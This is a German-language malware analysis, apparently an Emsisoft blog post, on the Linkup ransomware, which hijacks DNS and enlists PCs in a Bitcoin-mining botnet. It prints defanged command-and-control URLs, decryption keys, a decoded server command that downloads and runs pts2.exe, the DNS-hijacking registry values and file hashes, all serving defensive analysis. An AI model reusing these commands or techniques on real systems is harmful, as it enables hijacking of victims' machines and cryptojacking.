Im Laufe der letzten Woche hat das Malware-Analystenteam von Emsisoft eine neue Ransomware und Trojaner-Variante verfolgt, die von Emsisoft Anti-Malware als Trojan-Ransom.Win32.Linkup erkannt wird.
„Linkup“ ist eine interessante Ransomware, da sie anders als früherer Varianten nicht direkt Ihren PC blockiert oder Dateien verschlüsselt. Stattdessen blockiert Linkup den Internetzugang durch Veränderung Ihres DNS und kann ebenso Ihren Computer in einen Robot verwandeln, der Bitcoins abgreift.
So schützen Sie sich gegen Linkup
Nutzer von Emsisoft Anti-Malware sind automatisch gegen Linkup geschützt und sollten das Programm blockieren, falls es als Trojan-Ransom.Win32.Linkup erkannt wird. Nutzer, die mit Linkup infiziert wurden, werden vom Internet abgeschnitten und sehen die folgenden „Website“, wenn Sie im Internet surfen möchten.
Zu sehen ist das typische Ransomware-Formular, über das in diesem Fall persönliche Informationen und eine Zahlung zur Entsperrung des Internetzugangs gefordert werden. Im Formular ist zu lesen, dass Ihnen lediglich 0,01 EUR berechnet werden, aber dies ist nicht bestätigt und höchstwahrscheinlich eine glatte Lüge. Übermitteln Sie keinerlei persönliche Informationen! Falls Ihr Computer infiziert wurde, raten wir Ihnen dazu, auf andere Weise Verbindung zum Internet aufzunehmen und sich an den Emsisoft-Support zu wenden, der Ihnen gerne bei der Entfernung hilft.
So funktioniert Linkup
Sobald der Linkup-Trojaner ausgeführt wird, erstellt er eine Kopie von sich selbst im Verzeichnis %AppData%MicrosoftWindows namens svchost.exe, eine gefälschte Kopie einer normalen Datei, die man üblicherweise im Verzeichnis %windir%system32 findet. Um seine Anwesenheit im System zu melden, erstellt Linkup ein Mutex namens tnd990r oder tnd990s. Wir haben ebenso festgestellt, dass Linkup die Sicherheits- und Firewall-Dienste von Windows deaktiviert, um die Infektion zu erleichtern.
Sobald sich Linkup auf Ihrem PC häuslich niedergelassen hat, kontaktiert er seinen Server und liefert ihm Daten über Ihren Rechner. Dies erfolgt durch Senden einer POST-Anfrage an die folgenden Adresse, die verschlüsselt übertragen wird.
uid=xxxxx&ver=3.55&dl=0&il=0&dip=j5w4FFXB&wl=ENU &wv=5.1.2600.SP3.0.256.1.2.x86&ia=1
Darum handelt es sich um Ihre Unique User ID (uid), Ihre Windows-Version (ver) und die Sprache, die Sie verwenden – hier ENU, also US-Englisch. Diese Informationen erleichtern die Infektion, da Linkup wissen muss, auf welcher Art von Computer er läuft, um richtig zu funktionieren.
Linkup baut sich ebenfalls eine Redundanzschicht auf, sodass es selbst dann mit einem anderen Befehls- und Steuerserver kommunizieren kann, wenn ein Host ausfällt. Durch Entschlüsseln sehen wir die folgenden Befehl- und Steuerhosts:
hxxp://62.75.221.37/uplink.php?logo.jpg
hxxp://hoseen45r.com/uplink.php?logo.jpg
hxxp://onetimes21s.com/uplink.php?logo.jpg
hxxp://setpec14rs.com/uplink.php?logo.jpg
Linkup entschlüsselt den String mit dem folgenden Schlüssel:
IVW-Q3Xo5sBYzDTJK6LPuSrvEkAcghH8lw0GbfFe9dn_MRpqxONZam7ij2yUC14t
Weitere Analysen von Linkup zeigen einen weiteren interessanten String, bei dem es sich in der Tat um einen weiteren Entschlüsselungskey handelt:
Fo6u-YTelBCv0Ac4XiRW_1GJSV2O8jP7nZkbwqLENshpHtg5Kxa3QMfzrUDy9dmI
Dieser Key übersetzt Befehle vom Server von Linkup, damit die Malware diese ausführen kann. Bei der ersten Verbindung sieht der zuallererst gesendete Befehl wie folgt aus:
nK_RglbAg_3Axlb0z0bv1Bq6NokWKiej59kcg-WcKlb0f-bvara0Kdk0a0ejr1LvFFXV
Linkup entschlüsselt diesen Befehl mit seinem Schlüssel hierzu:
IL 62.75.221.37 RUN hxxp://91.220.163.22/pts2.exe
Der erste Befehl (IL 62.75.221.37) leitet jede HTTP-Anfrage auf die Website der Ransomware um, die unter 62.75.221.37 zu finden ist, mit der Adresse hxxp://62.75.221.37/worlds/test/index.html. An diesem Punkt leitet Linkup Ihren DNS dann dermaßen um, dass Sie beim Surfen auf der Website der Ransomware landen.
Um jede einzelne DNS-Anfrage umzuleiten, nimmt Linkup auch ein paar Änderungen in der Registrierdatenbank von Windows vor, darunter die folgenden:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersInterfaces%interfaceGUID% "NameServer" = "127.0.0.1"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipParametersInterfaces%interfaceGUID%"DhcpNameServer" = "127.0.0.1"
Linkup vollendet dann diese Aktionen durch Aktualisierung verschiedener Einstellungen Ihrer Internet- und Netzwerkverbindung, damit alle Veränderungen sofort übernommen werden. Dazu werden die folgenden Befehle verwendet:
Diese Weiterleitung ist schon schlimm genug, aber Linkup geht interessanterweise noch weiter. Beachten Sie die zweite Zeile des ursprünglichen Befehls des Servers: RUN hxxp://91.220.163.22/pts2.exe. Dieser Befehl weist Ihren Computer an, die Datei pts2.exe herunterzuladen und auszuführen. Was ist pts2.exe? Ein Downloader, der Ihren Computer mit einem Botnet verbindet, das Bitcoins abgreift!
Ein Botnet, das Bitcoins abgreift?
Die technischen Vorgänge hinter dem „Abgreifen von Bitcoins“ sind komplex. Eine gute Zusammenfassung bietet “Geeks Love The Bitcoin Phenomenon Like They Loved the Internet in 1995” von Ken Tiddel oder Angriff auf Bitcoins von Emsisoft.
Im Falle von Linkup ist der wichtigste Punkt, den Sie verstehen sollten, dass ein Hacker mehr Bitcoins verdienen kann, wenn er über mehr Rechenleistung verfügt. Daher versucht Linkup – neben der Blockierung Ihres Internetzugangs –, Ihren Computer mit einem Bitcoin-Mining-Botnet zu verbinden, sodass die Rechenleistung mehrerer infizierter Computer dazu verwendet werden kann, den Hinternmännern des Angriffs neue Bitcoins einbringen kann.
Pts2.exe ist ein Downloader und wird im gleichen Verzeichnis wie die gefälschte svchost.exe platziert, mit der wir diese Analyse begonnen haben. Hinter den Kulissen wird pts2.exe allerdings als Update_%random%.exe verarbeitet. Dies ist eine .NET-basierte Datei zum Herunterladen und Ausführen einer weiteren Datei von hxxp://64.32.28.155/b.exe, die dann im Verzeichnis C:UsersPublicb.exe gespeichert wird.
jhProtominer. Wie der Name bereits suggeriert handelt es sich bei jhProtominer um eine Bitcoin-Mining-Anwendung.
Diese Verbindung aus Ransomware und Bitcoin-Mining ist eine neue und faszinierende Entwicklung. Bisher ist diese Funktionalität noch recht beschränkt, denn die heruntergeladene Datei jhProtominer funktioniert nur in Systemen mit 64 Bit. Im Laufe der Zeit werden weitere Veränderungen von Linkup interessant zu beobachten sein, mit denen flexiblere Varianten heruntergeladen werden können.
Hashes der in diesem Artikel analysierten Dateien
- Trojan-Ransom.Win32.Linkup MD5: f1304992523cd68f7412a355d2fb9d5d SHA1: ce70e50707b456e0e2f086126bdcfa266d5a57ae
- pts2.exe (Bitcoin-Miner-Downloader) MD5: 7eb809d8ea5bfe602648752289669632 SHA1: 20bd75b9c47ac075d51783a5f3c5309091c7c6a7
- b.exe (Bitcoin-Miner-Paket – Selbstextrahierendes Archiv) MD5: 29eea4cd040bff1028d5b6092f22f9bf SHA1: 1b3389328f9ebf706f09445ca0adc5efd2e98f79
- j.exe (jhProtominer) MD5: 2e9a71e4ee33d190056e081e6726fa56 SHA1: db355fc276b8174e1753f45dbdf52536f7740316
Was halten Sie von Linkup?
In den kommenden Wochen wird das Malware-Analystenteam Linkup aufmerksam verfolgen, da sich diese Malware mit großer Sicherheit weiterentwickeln wird. Wir stellen Ihnen diese Analyse bereit, da Linkup einen neuen Infektionsweg verfolgt, der zwei bekannte Techniken vereint – Ransomware und Bitcoin-Mining –, um eine leistungsstarke Malware zur Generierung von Einnahmen zu erzeugen.
Falls Sie Fragen zu Linkup haben sollten, wenden Sie sich am besten direkt an den Emsisoft-Support. Dort können Sie gerne Ihre Gedanken oder auch Ihre eigenen Erkenntnisse mitteilen, damit wir bei Emsisoft die Welt etwas sicherer von Malware machen können. In der Zwischenzeit bleiben Sie sauber und eine gute (ransomware-freie) Zeit!
Abstrakt: Das Malware-Analystenteam von Emsisoft hat aufmerksam eine neue Ransomware und Trojaner-Variante verfolgt, die von Emsisoft Anti-Malware als Trojan-Ransom.Win32.Linkup erkannt wird.
Linkup kann Ihre DNS blockieren und Ihren PC in einen Bitcoin-Mining-Robot verwandeln!
Lesen Sie weiter und erfahren Sie mehr.